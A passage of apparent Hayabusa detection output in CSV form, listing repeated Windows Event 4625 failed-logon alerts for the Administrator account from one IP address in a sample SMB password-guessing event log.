NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ODkwHD0dwGaWhVH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5bPQ5GsX1UUXA6ws : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bvRQ0dVaLawXoo2O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BjxwDdOYBDDSJGun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: czlTDa1F6edSUBdy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mrtgv5HAqRuelEvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfny9Y4SGRZTUXi7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hdhoRgnyj4JPpN2j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K4Qclkpq5ZMKmdCB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0GdZSrcqmfGBfAVy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.655 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XA7eJrFopzOb3YQS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.689 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2XoSwawv7Ji26GQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 637CaCAc9u7z99X7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Y6Pww45qxQjrZ0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5CPU20SF5i6Cdq34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HAdaPDVTws6TObvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KUCoisntgbX7Mnis : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MFN0b769jRyDxyAW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HKr2OCyezvSEsHBZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.034 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QN3snXM4mwhauvvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.163 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1VpvQgnwXVxRY1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.233 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5bsnUZjpHrbD6kN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.286 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hpL2QnQ0kKqU40a6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rpkpNfeTsOeXEsJ0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5mBhuTFm02IjipEw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.443 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yZ908ZOCkSBC7tms : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8l7Bct5nMTZHd5mK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.522 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRk6e7SrInMDsdMV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhGByctTcM7NXGtB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BgzhW3Pd5JAB8j4f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.643 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GZOm1J5kdItrQpGL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DK77Hylw8CJHVGvb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pf7DQVQY7AowT8NY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.762 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4us3HR9jseQWIHt8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhJRmgooz8CXjB6E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LkjIXxAvEDrPFUpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ENc8aqouBangyUrU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7flMdluc8YRhOuzn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:43.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8WFqeMJIXGDjDP0a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.015 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iKeRDzfuDCJSv4Wh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gNEYkgBoG8rAE6SP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vyy1aBvh6lJBs5M5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.146 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyhiWNroUS5X5AEh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xg9rUUIwEfujwCvq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zfvpeyTKc3YYkVkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJGR6CYKLUJp2fWl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cmSap0AJZq0KMRBV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnVCbq1IYZF19oYR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aVaDMa2uNXTZNcBj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ymf6Fhv5ieWwcq73 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CT6YMlX1GqeEuAHl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FDJ1IFpMNQ2Euhyn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EGTzqnHJIiZdSgNk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: epSckAKbAp8qag89 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NNC8ilAuznKPwFvV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.834 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wObt647cIBPiVaZi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nYDe1L7NNxDGQ0Vt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mXroClxv7B0aCTYv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:44.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kCVah2QOH1hMSV76 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.020 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2HjD65Xy4Hppim2l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwmEQxC4iTcF4aFu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.114 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q3QxOH7ok8RR068t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dJFj6Ckw1HdK9w52 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qqu3Im4HXQNyGnYm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bk5dmjQDnpSlREum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.279 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pk4BvYgXBR2whf80 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i6n1su2TUr7ONQr4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: givsEAGfG0smN9Re : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i2YuM0i7a2QuY7xb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xuocQPZpd91adY0E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PvGB1dZrfDWyZoqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w4oi8iL88rJo7g2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cF3OUnytXi4NjvqB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WKkJcp3TYj31iJUM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G0E44RVqAE1feU0b : IP Address: 192.168.198.149 : AuthPackage: 